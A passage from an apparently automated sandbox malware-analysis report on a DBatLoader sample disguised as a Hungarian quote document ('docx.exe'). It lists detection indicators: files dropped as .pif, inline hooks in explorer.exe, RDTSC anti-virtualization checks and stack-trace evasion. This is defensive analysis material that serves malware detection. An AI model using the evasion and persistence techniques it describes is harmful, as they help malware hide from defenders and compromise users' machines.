#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002764000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: esentutl.exe, 00000003.00000003.1766177513.0000000005350000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.3.dr
          Source: Binary string: ping.pdb source: esentutl.exe, 00000004.00000003.1771269701.0000000005700000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.4.dr
          Source: Binary string: SndVol.pdb source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected DBatLoader
          Source: Yara matchFile source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.29a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: alpha.pif.3.drStatic PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_029B894C
          Source: alpha.pif.3.drStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029CD2FC push 029CD367h; ret 0_2_029CD35F
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A63B0 push 029A640Bh; ret 0_2_029A6403
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A63AE push 029A640Bh; ret 0_2_029A6403
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A332C push eax; ret 0_2_029A3368
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029AC349 push 8B029AC1h; ret 0_2_029AC34E
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029CC378 push 029CC56Eh; ret 0_2_029CC566
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029CD0AC push 029CD125h; ret 0_2_029CD11D
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B306B push 029B30B9h; ret 0_2_029B30B1
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B306C push 029B30B9h; ret 0_2_029B30B1
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029CD1F8 push 029CD288h; ret 0_2_029CD280
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BF108 push ecx; mov dword ptr [esp], edx0_2_029BF10D
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029CD144 push 029CD1ECh; ret 0_2_029CD1E4
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A6782 push 029A67C6h; ret 0_2_029A67BE
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029A6784 push 029A67C6h; ret 0_2_029A67BE
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029AD5A0 push 029AD5CCh; ret 0_2_029AD5C4
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029CC570 push 029CC56Eh; ret 0_2_029CC566
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029AC56C push ecx; mov dword ptr [esp], edx0_2_029AC571
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B8AD8 push 029B8B10h; ret 0_2_029B8B08
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BAADF push 029BAB18h; ret 0_2_029BAB10
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BAAE0 push 029BAB18h; ret 0_2_029BAB10
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029ACA4F push 029ACD72h; ret 0_2_029ACD6A
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029ACBEC push 029ACD72h; ret 0_2_029ACD6A
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_02A14850 push eax; ret 0_2_02A14920
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B886C push 029B88AEh; ret 0_2_029B88A6
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B790C push 029B7989h; ret 0_2_029B7981
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B6948 push 029B69F3h; ret 0_2_029B69EB
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B6946 push 029B69F3h; ret 0_2_029B69EB
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B5E7C push ecx; mov dword ptr [esp], edx0_2_029B5E7E
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B2F60 push 029B2FD6h; ret 0_2_029B2FCE
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_208FEC50 push 38207BA7h; iretd 0_2_208FEC9D
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047D647E push ecx; ret 5_2_047D647F

          Persistence and Installation Behavior

          barindex
          Drops PE files with a suspicious file extension
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the user root directory
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xEF
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_029BAB1C
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\SndVol.exeRDTSC instruction interceptor: First address: 47C9904 second address: 47C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\SndVol.exeRDTSC instruction interceptor: First address: 47C9B7E second address: 47C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
